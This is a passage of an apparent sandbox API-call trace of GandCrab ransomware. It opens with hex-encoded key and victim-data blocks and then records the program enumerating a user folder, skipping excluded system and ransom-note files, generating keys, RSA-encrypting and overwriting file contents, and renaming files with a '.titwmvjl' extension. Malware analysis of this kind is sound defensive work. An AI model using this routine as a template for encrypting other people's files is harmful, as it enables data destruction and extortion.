68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.422] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0069.423] CloseHandle (hObject=0x2d4) returned 1 [0069.423] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.423] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.423] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x2db)) [0069.423] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.423] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.423] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.424] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock") returned 97 [0069.424] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0069.424] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.424] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.426] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned 73 [0069.426] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*" [0069.426] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503738 [0069.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.426] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0069.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.427] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0069.427] lstrcmpW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".") returned 1 [0069.427] lstrcmpW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="..") returned 1 [0069.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" [0069.427] lstrlenW (lpString=".titwmvjl") returned 9 [0069.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0069.427] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.427] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.titwmvjl") returned 126 [0069.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0069.427] lstrlenW (lpString=".crl") returned 4 [0069.427] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.427] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".crl ") returned 5 [0069.427] lstrcmpiW (lpString1=".crl", lpString2=".titwmvjl") returned -1 [0069.427] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0069.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="desktop.ini") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="autorun.inf") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntuser.dat") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="iconcache.db") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="bootsect.bak") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="boot.ini") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntuser.dat.log") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="thumbs.db") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="KRAB-DECRYPT.html") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="CRAB-DECRYPT.html") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntldr") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="NTDETECT.COM") returned -1 [0069.428] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="Bootfont.bin") returned -1 [0069.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0069.428] lstrlenW (lpString=".crl") returned 4 [0069.428] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.428] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".crl ") returned 5 [0069.428] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.428] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.429] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0069.429] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.429] ReadFile (in: hFile=0x2dc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0069.440] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.440] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0069.441] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.441] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.441] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.441] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0069.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.441] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.441] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.442] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0069.442] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.442] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.442] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.442] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0069.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.443] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.443] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.443] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0069.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.443] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503578) returned 1 [0069.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.444] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0069.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.444] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0069.444] GetLastError () returned 0x0 [0069.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.444] CryptDestroyKey (hKey=0x503578) returned 1 [0069.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.444] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.445] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0069.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.445] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503478) returned 1 [0069.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.445] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0069.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.445] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0069.446] GetLastError () returned 0x0 [0069.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.446] CryptDestroyKey (hKey=0x503478) returned 1 [0069.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.446] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.446] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.446] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.446] ReadFile (in: hFile=0x2dc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e4f8*=0x27d, lpOverlapped=0x0) returned 1 [0069.452] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffd83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.452] WriteFile (in: hFile=0x2dc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e4dc*=0x27d, lpOverlapped=0x0) returned 1 [0069.454] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.454] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.456] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.461] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.461] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.462] CloseHandle (hObject=0x2dc) returned 1 [0069.463] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.titwmvjl" (normalized: 